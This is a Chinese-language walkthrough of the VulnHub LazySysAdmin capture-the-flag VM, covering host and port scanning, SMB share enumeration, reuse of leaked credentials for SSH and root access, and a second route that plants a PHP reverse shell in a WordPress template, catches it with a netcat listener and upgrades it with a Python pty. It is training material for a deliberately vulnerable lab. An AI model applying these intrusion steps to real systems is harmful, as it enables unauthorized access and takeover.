VulnHub|渗透测试入门(三)

红日安全成员 -- Mochazz

环境下载

Lazysysadmin.zip (Size: 479 MB)
Download: https://drive.google.com/uc?id=0B_A-fCfoBmkLOXN5Y1ZmZnpDQTQ&export=download
Download (Mirror): https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip
Download (Torrent): https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip.torrent ( Magnet)

运行环境

  • Virtualbox (二选一)
  • Vnware Workstation player

通关提示

  • Enumeration is key
  • Try Harder
  • Look in front of you
  • Tweet @togiemcdogie if you need more hints

ip探测

由于我们的目标与我们的物理机位于同一网段,所以我们要做的就是先获取目标机器的地址。在内网主机探测中,可以使用netdiscover来进行。

netdiscover -i wlo1

➜  evilk0 netdiscover -i wlo1

Currently scanning: 192.168.21.0/16   |   Screen View: Unique Hosts             

 1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 42                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.0.100   08:00:27:da:8a:ac      1      42  PCS Systemtechnik GmbH

端口扫描

我们需要知道目标机器上运行了哪些服务,利用某些服务的漏洞或配置不当来进行攻击,所以我们先进行端口扫描。

使用masscan扫描

masscan 192.168.0.100 -p 1-10000 --rate=1000

➜  evilk0 masscan 192.168.0.100 -p 1-10000 --rate=1000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-01-31 12:53:27 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [10000 ports/host]
Discovered open port 3306/tcp on 192.168.0.100                                 
Discovered open port 6667/tcp on 192.168.0.100                                 
Discovered open port 22/tcp on 192.168.0.100                                   
Discovered open port 139/tcp on 192.168.0.100                                  
Discovered open port 80/tcp on 192.168.0.100                                   
Discovered open port 445/tcp on 192.168.0.100

使用nmap扫描

nmap -T4 -A -v 192.168.0.100 -p 0-10000

➜  evilk0 nmap -T4 -A -v 192.168.0.31 -p0-10000        

Starting Nmap 7.50 ( https://nmap.org ) at 2018-01-31 20:55 CST
.................................
Scanning LazySysAdmin.lan (192.168.0.100) [10001 ports]
Discovered open port 80/tcp on 192.168.0.100
Discovered open port 22/tcp on 192.168.0.100
Discovered open port 139/tcp on 192.168.0.100
Discovered open port 445/tcp on 192.168.0.100
Discovered open port 3306/tcp on 192.168.0.100
Discovered open port 6667/tcp on 192.168.0.100
.................................
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1.0
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.2.107
|_  error: Closing link: (nmap@192.168.2.107) [Client exited]
MAC Address: 08:00:27:DA:8A:AC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Uptime guess: 0.008 days (since Wed Jan 31 20:44:16 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   LAZYSYSADMIN<00>     Flags: <unique><active>
|   LAZYSYSADMIN<03>     Flags: <unique><active>
|   LAZYSYSADMIN<20>     Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2018-01-31T22:55:23+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms LazySysAdmin.lan (192.168.0.100)

NSE: Script Post-scanning.
Initiating NSE at 20:55
Completed NSE at 20:55, 0.00s elapsed
Initiating NSE at 20:55
Completed NSE at 20:55, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.19 seconds
           Raw packets sent: 11045 (487.680KB) | Rcvd: 11034 (442.816KB)

对比可发现masscan扫描端口的速度比nmap快很多,但是想要知道端口所运行服务的具体信息,就要用到nmap了。根据扫描结果可知目标机开启了22、80、139、445、3306、6667这几个端口。

我们先从web入手。我们先使用dirb来爆破目标存在的目录(dirb安装方法附在文章最后)

➜  evilk0 ./dirb http://192.168.0.100 wordlists/common.txt -o /home/evilk0/Desktop/result.txt
用法:./dirb 目标url 用于爆破的目录  -o 输出文件

在工具扫描的同时,我们手工探测漏洞利用点。访问目标web服务,未发现什么,查看是否存在robots.txt发现4个目录,并且存在目录遍历漏洞,但是并没用获取到可以利用的信息。

http://192.168.0.100/robots.txt

User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

使用curl获取目标web的banner信息,发现使用的中间件是apache2.4.7,目标系统为Ubuntu。

➜  evilk0 curl -I 192.168.0.100

HTTP/1.1 200 OK
Date: Wed, 31 Jan 2018 13:01:20 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Sun, 06 Aug 2017 05:02:15 GMT
ETag: "8ce8-5560ea23d23c0"
Accept-Ranges: bytes
Content-Length: 36072
Vary: Accept-Encoding
Content-Type: text/html

我们再来看看dirb扫描结果,发现目标文章用的是wordpress,且还有phpmyadmin

➜  dirb222 cat /home/evilk0/Desktop/result.txt | grep "^+"

+ http://192.168.0.100/index.html (CODE:200|SIZE:36072)
+ http://192.168.0.100/info.php (CODE:200|SIZE:77257)
+ http://192.168.0.100/robots.txt (CODE:200|SIZE:92)
+ http://192.168.0.100/server-status (CODE:403|SIZE:293)
+ http://192.168.0.100/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.0.100/phpmyadmin/index.php (CODE:200|SIZE:8262)
+ http://192.168.0.100/phpmyadmin/libraries (CODE:403|SIZE:300)
+ http://192.168.0.100/phpmyadmin/phpinfo.php (CODE:200|SIZE:8264)
+ http://192.168.0.100/phpmyadmin/setup (CODE:401|SIZE:459)
+ http://192.168.0.100/wordpress/index.php (CODE:301|SIZE:0)
+ http://192.168.0.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)
+ http://192.168.0.100/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.0.100/javascript/jquery/version (CODE:200|SIZE:5)
+ http://192.168.0.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
+ http://192.168.0.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

wpscan扫描结果

root@kali:~# wpscan http://192.168.0.100/wordpress
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.0.100/wordpress/
[+] Started: Thu Feb  1 01:37:20 2018

[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/

[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml

[+] WordPress theme in use: twentyfifteen - v1.8

[+] Name: twentyfifteen - v1.8
 |  Last updated: 2017-11-16T00:00:00.000Z
 |  Location: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/
 |  Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt
[!] The version is out of date, the latest version is 1.9
 |  Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css
 |  Theme Name: Twenty Fifteen
 |  Theme URI: https://wordpress.org/themes/twentyfifteen/
 |  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Thu Feb  1 01:37:24 2018
[+] Requests Done: 356
[+] Memory used: 37.98 MB
[+] Elapsed time: 00:00:04

enum4linux 192.168.0.100

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb  1 00:46:08 2018

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.0.100
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.0.100    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 192.168.0.100    |
 ============================================= 
Looking up status of 192.168.0.100
    LAZYSYSADMIN    <00> -         B <ACTIVE>  Workstation Service
    LAZYSYSADMIN    <03> -         B <ACTIVE>  Messenger Service
    LAZYSYSADMIN    <20> -         B <ACTIVE>  File Server Service
    WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

    MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 192.168.0.100    |
 ====================================== 
[+] Server 192.168.0.100 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.0.100    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 192.168.0.100    |
 ======================================= 
[+] Got OS info for 192.168.0.100 from smbclient: 
[+] Got OS info for 192.168.0.100 from srvinfo:
    LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server
    platform_id     :   500
    os version      :   6.1
    server type     :   0x809a03

 ============================== 
|    Users on 192.168.0.100    |
 ============================== 


 ========================================== 
|    Share Enumeration on 192.168.0.100    |
 ========================================== 
WARNING: The "syslog" option is deprecated

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    share$          Disk      Sumshare
    IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    WORKGROUP            

[+] Attempting to map shares on 192.168.0.100
//192.168.0.100/print$  Mapping: DENIED, Listing: N/A
//192.168.0.100/share$  Mapping: OK, Listing: OK
//192.168.0.100/IPC$    [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 192.168.0.100    |
 ===================================================== 


[+] Attaching to 192.168.0.100 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

    [+] LAZYSYSADMIN
    [+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

    [+] Minimum password length: 5
    [+] Password history length: None
    [+] Maximum password age: Not Set
    [+] Password Complexity Flags: 000000

        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0

    [+] Minimum password age: None
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 =============================== 
|    Groups on 192.168.0.100    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 192.168.0.100 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)
[+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username '', password ''
S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)

S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)


 ============================================== 
|    Getting printer info for 192.168.0.100    |
 ============================================== 
No printers returned.


enum4linux complete on Thu Feb  1 00:46:33 2018

windows下获取共享资源

net use k: \\192.168.0.100\share$

linux下获取共享资源

mount -t cifs -o username='',password='' //192.168.0.100/share$ /mnt

发现两个关键的文件deets.txt和wp-config.php

所以我们尝试用上面获取的mysql账号密码去登录phpmyadmin,但是发现没一个表项可以查看。

不过不要紧,上面还有一个密码是12345,而且之前我们登录WordPress页面的时候,页面显示My name is togie.,所以我们可以用账号:togie 密码:12345尝试登录ssh,发现可以成功登录。

togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie: 
root@LazySysAdmin:/home/togie# id
uid=0(root) gid=0(root) groups=0(root)

有了root权限,我们就有权限查看目标文件/root/proof.txt,这样就算完成了整个游戏了。这里刚好togie有root权限,所以我直接用sudo su切换到root权限,但是如果togie没有root权限,那么我们就需要通过其他方式来提权了。

思路二

通过账号:Admin 密码:TogieMYSQL12345^^登录WordPress控制面板,向404.php页面模板插入PHP反弹shell的代码。

编辑好后,点击下面的upload file应用,然后访问http://192.168.0.100/wordpress/?p=2

root@kali:~# nc -vlp 1234
listening on [any] 1234 ...
192.168.0.100: inverse host lookup failed: Unknown host
connect to [192.168.0.109] from (UNKNOWN) [192.168.0.100] 36468
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
 16:03:42 up 6 min,  0 users,  load average: 0.01, 0.15, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ sudo su
sudo: no tty present and no askpass program specified

出现no tty present and no askpass program specified,刚好目标机有python环境,所以我们导入Python的pty模块。

python -c 'import pty; pty.spawn("/bin/sh")'

但是我们不知道www-data的密码,所以接下来就要进行提权,先来看一下目标机的详细信息

$ uname -r
4.4.0-31-generic
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.5 LTS
Release:    14.04
Codename:   trusty

所以用CVE-2017-1000112提权即可,但是目标机上没有gcc,这时候,我们可以本地搭建和目标机一样的环境,在本地编译好提权exp后,在目标机器上运行即可。

dirb安装方法(kali已自带)

wget https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz
tar zxvf dirb222.tar.gz
cd dirb222/
apt-get install libcurl4-gnutls-dev
./configure && make
./dirb #运行即可

参考链接:

VulnHub Walk-through – LazySysAdmin: 1

LazySysAdmin Vulnerable Machine Walk-through

点击收藏 | 3 关注 | 3
  • 动动手指,沙发就是你的了!
登录 后跟帖